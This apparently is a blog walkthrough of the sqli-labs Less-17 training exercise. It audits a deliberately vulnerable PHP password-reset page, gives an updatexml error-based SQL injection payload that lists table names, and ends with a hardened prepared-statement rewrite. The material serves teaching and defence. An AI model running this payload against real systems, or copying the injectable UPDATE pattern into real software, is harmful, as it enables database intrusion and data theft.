sql-labs:less-17
A Xin • Published: 2021-09-04
Enter the wrong password and this is what you get.
Code audit
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-17 Update Query- Error based - String</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"><font color="#FFFF00"> [PASSWORD RESET] </br></font> <font color="#FF0000"> Dhakkan </font><br></div>
<div align="center" style="margin:20px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">
<div style="padding-top:10px; font-size:15px;">
<!--Form to post the contents -->
<form action="" name="form1" method="post">
<div style="margin-top:15px; height:30px;">User Name : <input type="text" name="uname" value=""/> </div>
<div> New Password : <input type="text" name="passwd" value=""/></div></br>
<div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>
</form>
</div>
</div>
<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
<font size="6" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

function check_input($value)
{
    if(!empty($value))
    {
        // truncation (see comments)
        $value = substr($value,0,15);
    }
    // Stripslashes if magic quotes enabled
    if (get_magic_quotes_gpc())
    {
        $value = stripslashes($value);
    }
    // Quote if not a number
    if (!ctype_digit($value))
    {
        $value = "'" . mysql_real_escape_string($value) . "'";
    }
    else
    {
        $value = intval($value);
    }
    return $value;
}

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    //making sure uname is not injectable
    $uname=check_input($_POST['uname']);
    $passwd=$_POST['passwd'];

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname."\n");
    fwrite($fp,'New Password:'.$passwd."\n");
    fclose($fp);

    // connectivity
    @$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    //echo $row;
    if($row)
    {
        //echo '<font color= "#0000ff">';
        $row1 = $row['username'];
        //echo 'Your Login name:'. $row1;
        $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
        mysql_query($update);
        echo "<br>";
        if (mysql_error())
        {
            echo '<font color= "#FFFF00" font size = 3 >';
            print_r(mysql_error());
            echo "</br></br>";
            echo "</font>";
        }
        else
        {
            echo '<font color= "#FFFF00" font size = 3 >';
            //echo " You password has been successfully updated " ;
            echo "<br>";
            echo "</font>";
        }
        echo '<img src="../images/flag1.jpg" />';
        //echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        echo '<font size="4.5" color="#FFFF00">';
        //echo "Bug off you Silly Dumb hacker";
        echo "</br>";
        echo '<img src="../images/slap1.jpg" />';
        echo "</font>";
    }
}
?>
</font>
</div>
</body>
</html>
A few key pieces of this code need to be understood:
function check_input($value)   // filters the username input
{
    if(!empty($value))
    {
        // truncation (see comments)
        $value = substr($value,0,15);   // keep only the first 15 characters
    }
    // Stripslashes if magic quotes enabled
    if (get_magic_quotes_gpc())   // checks whether magic quotes are on; returns 1 when magic_quotes_gpc=On
    {
        $value = stripslashes($value);   // removes the backslashes added by addslashes()
    }
    // Quote if not a number
    if (!ctype_digit($value))   // checks whether the value is all digits; returns true if it is
    {
        $value = "'" . mysql_real_escape_string($value) . "'";   // escapes the string
    }
    else
    {
        $value = intval($value);   // converts to an integer
    }
    return $value;
}
In short, after this series of filters, there is no way to work on the username; injection can only go through the password.
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
//echo $row;
if($row)
{
    //echo '<font color= "#0000ff">';
    $row1 = $row['username'];
    //echo 'Your Login name:'. $row1;
    $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
    mysql_query($update);
    echo "<br>";
This is the source of the query; passwd is the place to work on.
Since this is a password-change module, simply entering admin is enough to change the password successfully. But to retrieve database information we need XML error-based injection:
Below is an example of dumping the table names; the payload is not explained further.
' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)##
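As an added defensive example (not part of the sqli-labs code), the same reset handler rewritten with PDO prepared statements: passwd is bound as data instead of being concatenated into the UPDATE, database errors are no longer echoed to the client (the updatexml() technique only works because mysql_error() is printed), and the plaintext logging to result.txt is dropped. `$pdo` is an assumed PDO connection to the lab's MySQL database.

```php
<?php
// Added example: hardened Less-17 reset handler. $pdo is assumed to be a PDO
// connection to the lab's database (hypothetical; the lab itself uses mysql_connect).
function reset_password(PDO $pdo, string $uname, string $passwd): bool
{
    // Throw on SQL errors, but never print them: the error text is the oracle that
    // makes error-based injection readable.
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false); // real server-side prepares

    try {
        // Both values are bound as parameters; neither ever becomes part of the SQL
        // text, so a passwd like "' or updatexml(1,...)" is stored as a literal string.
        $sel = $pdo->prepare('SELECT username FROM users WHERE username = ? LIMIT 1');
        $sel->execute([$uname]);
        $row = $sel->fetch(PDO::FETCH_ASSOC);
        if (!$row) {
            return false;
        }

        // The lab stores plaintext passwords; a real application would bind
        // password_hash($passwd, PASSWORD_DEFAULT) here instead.
        $upd = $pdo->prepare('UPDATE users SET password = ? WHERE username = ?');
        $upd->execute([$passwd, $row['username']]);
        return true;
    } catch (PDOException $e) {
        // Server-side log only; the client sees the same generic failure message.
        error_log('password reset failed: ' . $e->getMessage());
        return false;
    }
}

if (isset($_POST['uname'], $_POST['passwd'])) {
    $ok = reset_password($pdo, (string) $_POST['uname'], (string) $_POST['passwd']);
    // One fixed message per outcome: no SQL error text, no user-enumeration detail.
    echo $ok ? 'Password updated.' : 'Reset failed.';
}
```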
This article is from cnblogs (博客园), author: {Zeker62}. Please credit the original link when reposting: https://www.cnblogs.com/Zeker62/p/15225993.html